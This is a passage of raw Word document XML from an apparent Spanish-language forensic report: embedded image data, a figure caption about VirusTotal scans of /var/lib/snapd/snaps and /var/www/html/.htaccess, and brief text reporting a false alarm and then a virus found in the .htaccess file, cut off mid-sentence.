U0Ku4ZmEgAvyCEf9GCjQdA0pH&#10;9VrsK2mC19PLsWZOIELmRCNpoZeco4zbhNjm5mWhCAkORfzG30HdXISMQ98aljCl8I5E6j/XI9y2&#10;FtqcPBytU8DOwab9LcoWFgrDPpqllKayxxQPe8Pk7ol1xErNzdJxE8dosjvkzsVOujyOKl/EZ6Yg&#10;MViB6kN50JQ3wdLRGXYmBbyqOshOnarD+Dvki4AeuLk4o6am87EjIiL6pbv2AHciHdGLtkLb7I5Z&#10;C6MQNVmJ4u1rEZ/VAH1hEhasykGdhwh4G2MR5d2EjPVJyK2XbsmJeS/moNohGM+vj0aERxM0m3Zg&#10;X30T9m3ainydPUJiohDpUApNibyvXtAdNN7qUy8S25wsPa8lSLf5ShqMtyazqozTOqlA2l7pNqde&#10;hJN0aOWQV/b3FYjeWwWn0GhsXheJKdBizStZ7Z8966QWac+twNYjSgQsjEb8086oPFiERrn7S9rm&#10;gu0VsPYTwXBlJAIUpUhYvAJpJ4zzTelLcpBysAFuIgxuey0KbvU5iN9U0P4WpUx/aAfWvNsAz5gt&#10;yNwYCosTVT33CjblIUlsD37LkfmP5QhprkC1PKuTro6jTovU3eK4TY7C5teWI8KhCjtX7WgXkq+m&#10;Di0OaPIxa2awPHZl0idQpe+H+/TzI/IUIiKim8cv+4t8Vf5Iyl4Ot/2L8OCqom6DA3XjP3gc+/fv&#10;jw/e34NFMfE48oXxiUXpGbili/+A1eIioEX8smic+Prf2LFrrzyFiIjo5tGHDzHc+Fyfno0pFqXY&#10;uZvhrS/+k8fx0qVLePqZJVjx4p8xZfI9hmnnz59vDW9SmIv98wLDcgxvRER0s+Kf0qIb0ogRwzE/&#10;Mhy33GKF4pJSfF1VjYl3e2CsrQ1yDnyInA8+lJckIiK6+TDA0Q1NqRwGX59JsL11DD797AiKj5TK&#10;c4iIiG5eDHBEREREZuYX/QwcERER0S8RAxwRERGRmWGAIyIiIjIzDHBEREREZoYBjoiIiMjMMMAR&#10;ERERmRkGOCIiIiIz0+574JxcJ8lDRERERHSj4hf5EhEREZkZ3kIlIiIiMjMMcERERERmhgGOiIiI&#10;yMzwQwxEREREZqZTgDte9n/yGBERERHdiHgLlYiIiMjMMMARERERmRkGOCIiIiIzwwBHREREZGYY&#10;4IiIiIjMDAMcERERkZlhgCMiIiIyMwxwRERERGaGAY6IiIjIzDDAEZkYMWAg7hqmhOPgoRjYT55I&#10;RER0g+Gf0qKbnp2FBcJtxmLqyNGwGzxYngpcuHQZhbozyK4/hbdP1eIiWn9ViIiIflYMcHRTWzzW&#10;EZF29sj7rg6a7+pR8eMPqDh7FsMHDsTtQ4bCZagST906Fs0izP2hvETMPyuvSURE9PPhLVS6acU7&#10;3IHZNraIO1aGBV/+C++crkVJkw73DR+JuvN6FHz/Hd745t94sPj/8KnuDN66826MHzJMXpuIiOjn&#10;c3MGOIUN1MGhiJjjCzt50hXZBmLNhlC4yqPmxRnh65YjzEEepVbP2NojyHoMHhbhLLPuW3mq0QsO&#10;zu2Cmu7iBcSIkPdadRW2uU3A6EGD5DlERPTTUkC9cBXi/UbJ4+ZL5RONpKVeUMnjfXVdApy1dyjW&#10;bEtBvvYAivPfR37mesSHul+hkM6I2PUOUp+yl8fbc3xqGzQr1FDYBiNZk4I4b4U853pRImDZRiTM&#10;cYedrRLWtv6IWxZ8hYA2CiFLfwfHkiIcl6f8FBR+y5G/K7TnMNlbCl8kaDYi3KoC2jIbRMYEX79t&#10;/wLYWwzBH8c6ILbiKGrP6+WpPdteU4WT535EzDhneUo3BtkiVX0/ir19oZX+3T0Ra6wGi7eiG5d6&#10;nBrZtw2Vx4xUVhOgdbbuXO5+gxF0mzsy7vY11nGiGqnO9gi4TtlWMdwV+e6213DeKhBwi7hAGyCP&#10;EtGVOcxGqmi3r9Qe/xQM7V12LAJ6+Wao8IhE3DQ98ksaxIg7wtZtQ37+AWjzU5G6IhCu8nZcgyMR&#10;5tHzRhUewYie1vIe3n0e6cwZcZkfoiwzCp7ylBYK72hoij9EhmFb0nIpiO9QHt0RLXR+0VhynXJN&#10;nwOc9bTlSFvnj+astZgV8AA8pzyKoOeycFxlD7suy1iF3NeSkHSwVh6/gpoCJK/fioyS3jewvWMP&#10;9QRA88paxL+Sg2KVM9Q+7rDsoqwKj9mIcNQi8c0KXO9S/KeUvbkV+bahiLjuQdh8PTvWHv9sOI28&#10;M/XylF7q1w9/FqFv6khr2Fm0fdjhii7UIrqwAGrxL+BoLezG3YWoXqx2w+s3FBFuExFlcQYJpZ9g&#10;klTHz4uQ+N0l2A0ZKC/0cxmMqXa28P25i0FkBjxnBmJ0eQVGPxLcKZD8VPSF6VizKQvaXjWqozD9&#10;WX/otm+FRrxduz4bjSirHEQEPQB10DJkq4Ixd7LUM6eAk18wprv03M5ZuvgjJNBGvijtZR5ppwmN&#10;Vr6Y5WO6LyWmzvSFqrFJHr8CXQESttci4OlAWMuT+qJvAU6hxpKFzsh/bhHis0pRrZMm6qErL0DK&#10;33NQJr1A4gAnazYiftlGaKSkP2cMvJ6IxVwRoiQq71Akpb2DfM070KStwqyWrjApacfMxhRrBdTL&#10;UpCxLgoJu1JF8n4f+buiEWAlLWSPkBVbkJ0tpmtM07gCjtOikZL9jkjpxh7BOD/xgonyxovhWY42&#10;CNkgzTuAsn/MhpudP5LE/hOmmb4gCrg9ogYO5RhPtJZ6LF0v9ietm4KkOc7ySWCDAGm65n3D/jS7&#10;YhHS1Ylk5YWIDdugEfuSrh4yTK4eWqjE1cEaUU9pO1rNNiQtVBtfaBHCUjXL265aDL1sWxBhKw3b&#10;I0g6vmK7+ZoUpMSoMdq4lHg5ipB6CJgS6C6X9eYmnfC/HTkau2tPGidcpRp9M/Ia6uA/0nAC9pru&#10;XC0yzg6G27D+UAy+BWvuVCN/og/y7/ZGso3S0Ftt7HUaj2jnidBMlHrtJiBaKZW4PzxHuyPD817D&#10;Ohp3ZwTJPV2OI52R4ulj6OXL95yAuOEKw+ss9aZl3O6EBHexH28fZDvbwFcsmyq2oRXjGY4ihBo3&#10;cdXsRo9H+KXjiKioQUHzBePFzWU9tPUnkdJ4wbCMVGZXq/FIvVvUUSrzna4IHyrVZTAiRN2Tbhsv&#10;yi2X5XZrOBpXaq+fJcKlYyFt4+6JSBg9tLVXv+t6WyJeDAdZWGKuh6jzOEt5aSLqRLSHs/z02Lc+&#10;CbloH0hUHqHG9lZqq6R2aI50R62tLU7KfB/Fmlj4Kq7U9tkjQqyftDQWKZlSe/eOWC/Q8HuucAhE&#10;lAhlTtJ+vCORnJlqbLtE2xzt0+E2qUqNIJcKZOw3BiwLhQL6+gbUSVlDV4GUxfMRd7AJQetSET9Z&#10;CXWMKPOuSLi2tslythDlCnJQwC5UTIvxwujJsSjQrEeYaD/b5ZEu691BcwPyReBTS4FNngQrEQq9&#10;K6D5uIcAJ9Ttz0OxCJHGDNM3fQtwLmp4ioDQ2ksmQlf0LuMBMxwAEXLivAbAQuUu0n065gU8hIi9&#10;Js8bqfyxZl0omrcvQkDAo5ixXAsn75ZQZEqEKW8baJ4Lx5Qp85BY54slT4tAIsJflDho8TNmYcqD&#10;MUipVMJSHFGFOCk2L7RBrlhePeVRhKwqgtuyVYhyKRLLxiC1sgoZ8x8V8x6A6+N7cLQ6D1Fi/0v2&#10;m14SKOHqMArHSyrkcXHyiHq46ncgLOhRBMzXwu6ZSEwX+3N9ajniJ4hyPC5tcxYWvKtE1IZocXLL&#10;KxrYIGzlcoTU70D4g2K5gGXIUAViljjpWql8Eb9uNhR7lyFgykPwfXIrqn1ikTin++5d12eXI86l&#10;FHFi/9Jx2ApxvE3OuuOFFeKXxlk0b3SrxWAoBw5E+dkf5ClX79i5s7hraKdf625ZK8cibOhZaJsu&#10;wQKXUPTvIgR89jECvjiOxjGuiJLvXFooR2D0qRLDvLBqYJa9jQhaIxBx22Dkl32CKZ99guhvz8Fi&#10;gAiCQ52w2WEwcsu1hl6+kK8a4ObU1svnZqmA5istpnxaAu0QV2weewmJX3wC9eelOD7CCRHt75b2&#10;Un+oRyhRdvoURPEMVCNdReA0BrV8KXiOvwVWQx2QaD8QaaUfizKLuvz7Ambd4Qxfw3frDYV6WBNW&#10;lxjLUqYcj8guTk4L1QjYfVeKBz8Xx6n0JCzGTsDzlt3VuxHxxSXIbm7EziMfI+jrRnlLRNSRyi8Y&#10;vvV5yDhSitR3G+DbEkgM7VAosDfG0C77/j4dOr9QTJU6CwxtsT20L4Zj0owkfD+nm7ZPetZchK/V&#10;0rwZa1HmEYnIDr1WQc8Ew2L3fMN+QlYVQKdStmv/FS7ucKqrwFFD5xBQ/HoiUhW/Q1r2FhEOQ+Er&#10;QpnUaZT93CzEH2qCdr3IAqLdLJMmV+YgboZoEwPCsSDPBnEx/mhMj0HQ+iKcPrQWvgExSKsxbNao&#10;23qbsBDZMScLR12CESLPcwwOhFNhFnKbjePd0pWiuMYGXr3oLexJ3wKcTNTHSF+KxCelAyYFiRXQ&#10;6PRobrooZogTZFMBKsW4+K+Vwscf6pp0JO6vMlzF68qzkJDV9e3K6oPpyK2R5tQiv7AKKluR1MsL&#10;kK8TB31jLKJnOqN6fxa09Qp4BfoCB3cg5YiUhvWoK0xH0kElpgb24tmlVuJ63kKUVz5xjEqRsb0U&#10;hvAvGo8y3Sg4WtkjKHAUCl7bIfYtla8JZelbsU+nxnTT25biSmK6RwWSxXGolhbTS1cPixAvrh5a&#10;DPIOhLpeHA9xDKR96Gu0SBD7cwxUd9NbIvbvo5T3L0b1tSjYtAf5pieSOOh6C0XnK4mb0LD+A9Cg&#10;1+PHS5fkKVevUgQ4G4vWs/7KxBtYovevUXbv/dDcMQJllaXYKV6X5ssiXNnchUwPb6SNt4dT/8Gw&#10;szD+Kjb/UIOthl6sS6hsPIPqQUPFa9+E7O8HYvp4d8TbWMP6h1pknLsEr9HW4nLuOFLOGXu96s6e&#10;RFLDQEwdbUxm1Q0nkXteDFwWb2w/6nH09ElopV/Hi41ifCCsr9PzarrvygyBUwpqIf8WoUkcW5fR&#10;t8BpgCUixnsjW9QzZdwoWIh6uhl+JfTI/6YWZdIXGImy5P/QH3aDOr8VNetOIqH+nOH9QN98Cknf&#10;6qG2UsK7h3oTUU9GIegRd1S+m4dKMVa5PweVEwIRZCXetlrbIWO7rD8hgtC8FciQw071wT1IPdIA&#10;vWj/fnvFtk96c2lA/ptZxjtx9UXIL1fAztY0tIj3pZxS2D29CknLZmOKogipchZoJQU6fYOhPTTQ&#10;FSF5cTgenLcVGr07lryxDQnTuvhwg3iP14lAFrctBRlpGxHvL95/bO27vevQU73b0WmR8rENQkTu&#10;kDquZj2iRO5uLXqT36R6NzYroOhFE9KTvgU4EWKKFWqEeJv0IslU0sEQgafgazHSLAJE72p2BSII&#10;StuQx1qPkjiI8WEiXW/Xok76tOiuLYj2uF6fEGxCnU4Ba2uTE65dPdpOs3YZz+Bak3W7U7c9ab8K&#10;RVtYFvsQmaxXLETYVekaUCeP38x+uHQBIwYN6tNfWRg9SIHm3gRAEaajCz9CwFd1qNOfQcYZKYwo&#10;MPf28XA6U4oZRwoR8q8yZIuXvfV1vXyp7Sxo/YZGcYV5TIuwL2tQDEvMdRGBaHTPD9NJZWzZluG0&#10;7aHMjecvQDXQeAu2hfWggSJwttwWlVyC9kwTXEVA63zbU4Gg0UqUfd+IC2K549+WIEjU0fhPi4DP&#10;S5BsLAj0op5E9DNxCBTt9iioY7YZH9dJi4La2gshwT09zN++Le627RMhqqd2vzI9Bg8+mYSMMiXU&#10;z65H5gb/ds+G6etEeFPZw9gMK+Ho4ysu4sT0miJkbFqB8PVVUD/h3ymYKfyikDBTj+T54QgJm4eo&#10;7VKnyLW2y13RQ7s3D5B6MScHY6ouR4RaeVaPbOBk3QTddWiQ+xbg9FokbPoXJq1Yh5eC3WEndfEo&#10;xEH2i0DCC54ofX0PtOcv4/LlDt9gL8alKfqPNTh862NYLE4aaVWVx2OIfvh2DJIXl9YzDEo/TTch&#10;jyu8I7Az8WFYluch5ZW12Fk2Bp7jLVCUk4/L98/Fkx6jxEsmQpj3XCy4X4cPcoy3Q1u3K2kWw4ph&#10;XfROiasDkT5dfFo+8ivt07QQLdupQv4/6zH5mbnwNVxdKOH5WASClIexr9AkkImwua/kdsz7k6/x&#10;wx0qZ4QlbsZqw9WDcdvnC/OQP0o6Hs6GfSpsxRXEU244/k8tqnW1ONl8O3zFL51hH7MfxiSVcf/Z&#10;h3SG/autxIalZxL+9F/wVUjzJAqofW7DMa2x5/Bmd0q8qUjHxa2bW6DtX+XO3Iap8PW5H+WxK2vZ&#10;TnV9GVafs8FqhxHide2PyyI8nrtoDFfWSls8OExMMy7aad+G8QGj8JKrKwLQiIzaCrz0rR4uw4ei&#10;9HQdLls74cmhAw1vTdJt2gWjLuCD08YvG+5yWyaM21aKq25LwxtgWcMpnB7pgAVK4/ZUg29B9K0K&#10;HD7dKMoqziMra8OnO6tPf4md/Z2Q7DwWARbGZRWDlAhxnIB5/U4ioU6PovoGQ9nCBhvfYuyGj8c7&#10;7mMNn/aW9ttTWSQK1VhEWw02vjeIsiwYI8pS34TCbut9CecuDYSqix49IjLyDJ0G27xlmKR+COop&#10;0r8HMGlRPmyDH4ZTYQ4Oi3YoVrTLht9tBz+sTllp/Doqqc1r/eXtru07L7ePJlrXlX5KAzYIWbsB&#10;cRMakJ++FS9tOoxz4z3hJG2qRbkWRYPc4C/fqnQKXoy/rHgMntLzY9ItWtG2XT5dL94ZRVPe3Ayl&#10;dGfOQOyjWScunMWgwh5THvaErVzwZvFToRzZ9kiRVC7xQ99dvU201qs8C++cnoz4P0/Csb05hp7M&#10;tjqaLNeRgycmKL9CfrlJPrhGfX6Xq9u/ErNi82Dx8HN4K3c/ivLfQvIf7HH0L4uxJKuHT3boDuL5&#10;2CxYPLUBuYffw74XvHD0UGlruu+JvmQ/MnW+SMh4Gx/lbkZ48x5sPtAgXohkRL1ai6lrdyL/o7ex&#10;72V3HH9lJTYf6WLLNQeRXemO1blv4a/B7XsSpVuyZSJUBnW8B95B2Y6VeLnQGXEpb+PwR28h4ZEG&#10;bI7egIJ2u6tF2vKVyLCai7ey38PhfSsxQ5eFlIMN8nxBV4A10XugD12J3I/eQ35KBOw+Xocle6oM&#10;YXnbaxXwFHU6LOoabVcBrfwQUtnrK7G23AurxXE4nLsB4SiCtiXd205DmEctMg+IbRDOi1+qw43f&#10;wX1Y517jFsnVVahqPiePdeYuAtzHYhu9dwGa42XQKl2xeuQlpH0tXoux3vjo7nuxc6x4/Zp66I26&#10;eAaZ9UCY+72GdZKtziLxZAOazh5H1IlzmHqH9EEFX+y7fRSOH/8Cm69c9E4Uw2wRO84evlLH9bmT&#10;+OOxRrjdLran9kWu21g0n/wCLzeK8g2wxJPjxuNx6UMVl89i29HPkNhsiQWiTFr1r6H1cMcMiPVL&#10;q1As3rX0TcexpEqPGW4+OOztI+o5EBknalBm3G2X2pVFaG6sw/GRd2GfqFuuCH/NJ0uwRpRF3229&#10;zyLz23OY4uqDXH6IgagzhRfC/BTQpGvbXdTrDu1HgcIXYS5avBy7B82z1xnboW2zocp5C9kn5AVN&#10;9K7tu5JaEdy0sPvTZuTmvo3cl52hffXt9p9O1Rch7aACU+d4iVDVBM1/v4jNdf5ISHsPRaIdXKAq&#10;wPN/OSjqoYc2Kw/NwZtxODUCbod2YkOJF/4q2sTcjOcwuaYUx+XeQN3/ZkFj/Tvs+2gDnjRt20X7&#10;29t6G4l2Nb0UKgupjCbteCt7hGyTjoto76V/olyeohbqOYGwPCi239ug0w3+KS2Zwko06OLqvv0x&#10;VcBVnFxJLumYu2B/60Pb5kNc4SSKk/SECNmv9j4Y/9IFW4/B07fehseOfHrVf9/0XssRWHe7G6YW&#10;fWIIg0RE9BOy8sNfUn6HupcisNb0rpYZUngsQOpaG+wKfxEZV/ktVl0ZYD3GIV4exkhrO3xX19UT&#10;e798F3/Ui8a8o4uo+7wIJ5svoubYt+La3twMgupyJTLSP0N958rdtL48+wNCR9sYnmXT6r6Xp7aJ&#10;HuuAoz/ocK5DQBvWvx/ecPVCQtUxlP147Z9iJSKiXvrxBP63XLxP11Wh8nvzfnZ2wBAFvjuchfeO&#10;XcVtkm78tD1w7KGgG5StxWCk3TkRLxwvw0dn2nd/v+85CX8s/wKVJs+5DerXH684u+H0+Wb894m2&#10;r5YhIiL6OfStB64XAY0Rjm5E0t83/Z8z9dg0/k6MGzwE2sbvW2+J7vm2Bt9daPvk5Z1Dldju7olj&#10;P/6AFZVfGf4iAxER0c/p6nrgughsDGhkzsYMssDC2xzgrRqOQt33qBAh7diPZzFi4EA4DRmKO4Yo&#10;4ThkCF6v/hrv1p2S1yIiIvp59RzgOoS2vgU2xj26MQ0fOAj+I6zgOmwYbrMYAt2FC4a/uHD4++9Q&#10;3NTIXjciIrqhtAtwji7eqCwvNI6YBLeeY1cvgxnzGxEREVGfdXgGzhZn6tq+LOPKeauLOR0mXdW6&#10;RERERNRrXQS4mt6FL3mwbcpVBLOrWJSIiIiI2jMGOPl2qRTgOn8K1SRticG2sS5SWOukLuaZ6H4u&#10;EREREXVngPUt4ww9cFKoah/gTGKWGDSOdYhehtG2aR3mCiZTOs8kIiIiomswwHrMuPiWbDXSSgS4&#10;einAyVPED+OQSfoyDHacKoZMFmlxhT/lSkRERER9MMBKBDh5GCOsb8UZKcC15jGTACbfZm2b0rqQ&#10;+GG6nPzToN0IEREREV0HJgHuMkZaiQBX940cu1rTmeF/rdNaJ5vOl7QOGIe6+NJfIiIiIuq7fuM9&#10;fi2SljFsOYz/lcn3wBn/Z5zTuohxijyv9f+dwppJn1zHWe10O5OIiIiIujDAaoy9sQdOZKkRUg9c&#10;/TdyrpJDWOutU/FTnm74f7vQJua2jppOF+RR49Y6/iMiIiKiqwP8P0P/T02jk5k2AAAAAElFTkSu&#10;QmCCUEsDBBQABgAIAAAAIQC6bRnC3gAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXv&#10;gv9hGcGb3aTaWGM2pRT1VAq2Qultmp0modnZkN0m6b939aKXgcd7vPdNthhNI3rqXG1ZQTyJQBAX&#10;VtdcKvjavT/MQTiPrLGxTAqu5GCR395kmGo78Cf1W1+KUMIuRQWV920qpSsqMugmtiUO3sl2Bn2Q&#10;XSl1h0MoN42cRlEiDdYcFipsaVVRcd5ejIKPAYflY/zWr8+n1fWwm23265iUur8bl68gPI3+Lww/&#10;+AEd8sB0tBfWTjQKwiP+9wZv/vSSgDgqmCazZ5B5Jv/T59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6PWQnDQEAAD7CwAADgAAAAAAAAAAAAAA&#10;AAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA2j2kGQTlAAAE5QAAFAAAAAAAAAAA&#10;AAAAAACaBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAKAAAAAAAAACEAOm4D/dnEAADZxAAA&#10;FAAAAAAAAAAAAAAAAADQ6wAAZHJzL21lZGlhL2ltYWdlMi5wbmdQSwECLQAUAAYACAAAACEAum0Z&#10;wt4AAAAFAQAADwAAAAAAAAAAAAAAAADbsAEAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAh&#10;AC5s8ADFAAAApQEAABkAAAAAAAAAAAAAAAAA5rEBAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQ&#10;SwUGAAAAAAcABwC+AQAA4rIBAAAA&#10;">
                <v:group id="_x0000_s1152" style="position:absolute;width:53949;height:13798" coordsize="53952,13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qlYyAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LCN7q5oFSo6uItNKDFNSCeBuyYxLMzobsNon/vlsoeJzvPavNYGrRUesqywriaQSCOLe6&#10;4kLB9/nj9Q2E88gaa8uk4EEONuuX0QozbXs+UnfyhQgh7DJUUHrfZFK6vCSDbmob4sDdbGvQh7Mt&#10;pG6xD+GmlkkUzaXBikNDiQ3tSsrvpx+jYN9jv03j9+5wv+0e1/Ps63KISanJeNguQXga/FP87/7U&#10;YX6cpLP5YpEm8PdTAECufwEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDk8qlYyAAAAOMA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:shape id="Imagen 54" o:spid="_x0000_s1153" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:24231;height:1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qLzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5RW81Y3xL6mrlBZTQ71URejtkX0modm3Mbtq/PZuodDjMDO/YebLztTiQq2rLCsY9CMQ&#10;xLnVFRcK9rvV8wyE88gaa8uk4EYOlovHhzkm2l75iy5bX4gAYZeggtL7JpHS5SUZdH3bEAfvaFuD&#10;Psi2kLrFa4CbWsZRNJEGKw4LJTb0VlL+sz0bBab4/M426eGUjbt4Z07VYfPxnirVe+peX0B46vx/&#10;+K+91gqGcTyaTMfTIfxeCndALu4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAqfi6i8wA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                    <v:imagedata r:id="rId191" o:title="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 55" o:spid="_x0000_s1154" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Sitio web&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:28863;width:25089;height:13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ZnDyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW8iO5GapToKioUehIaRa+P7DMJZt+G7GrSf98tFHocZuYbZr0dbCOe1PnasYZkqkAQ&#10;F87UXGo4nz4mSxA+IBtsHJOGb/Kw3by+rDEzrucveuahFBHCPkMNVQhtJqUvKrLop64ljt7NdRZD&#10;lF0pTYd9hNtGzpRKpcWa40KFLR0qKu75w2rY97v99bI4XPK7NONrsTiO5+qo9eht2K1ABBrCf/iv&#10;/Wk0pGqWvCs1T+D3UrwDcvMDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAkQmZw8kAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                    <v:imagedata r:id="rId192" o:title="Interfaz de usuario gráfica, Sitio web&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1155" type="#_x0000_t202" style="position:absolute;left:1169;top:14034;width:51657;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zB/ywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsRtjKCbttpSioF6KsZfeHtnXbDT7Nuxu2vjvXUHocZiZb5jlerK9OJEPnWMFD7MM&#10;BHHjdMetgv3ny/0TiBCRNfaOScEPBVivrq+WWGl35g861bEVCcKhQgUmxqGSMjSGLIaZG4iTd3Te&#10;YkzSt1J7PCe47WWeZXNpseO0YHCgraHmux6tgl1x2Jm78fj8vike/dt+3M6/2lqp25tpswARaYqX&#10;8H/7VSvI87woyqws4e9SugNy9QsAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAAwzB/ywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="78EB8A75" w14:textId="6F28CA77" w:rsidR="00FB12A0" w:rsidRPr="008B22E9" w:rsidRDefault="00FB12A0" w:rsidP="00FB12A0">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>39</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="99" w:name="_Toc155782606"/>
                        <w:r w:rsidRPr="008F55FE">
                          <w:t>Análisis de /var/lib/snapd/snaps y /var/www/html/.htcaccess en VirusTotal.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="99"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virus total no detecta virus alguno, se puede entender como falsa alarma. Se ha procesado tanto comprimidos como sin comprimir todos los archivos independientes para corroborar con doble confirmación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1665182A" w14:textId="3C6ACD90" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Se procede a realizar análisis dentro de </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/www/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, como solo tenemos la carpeta html, procedemos entonces a realizar el análisis directamente en </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Para los archivos ocultos procedemos a quitar el pun</w:t>
      </w:r>
      <w:r w:rsidR="001C6280">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3FBE5" w14:textId="4F373B5C" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se detecta virus en </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/www/html/.htaccess</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Este archivo fue modificado por </w:t>
      </w:r>
      <w:r w:rsidR="001C6280">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
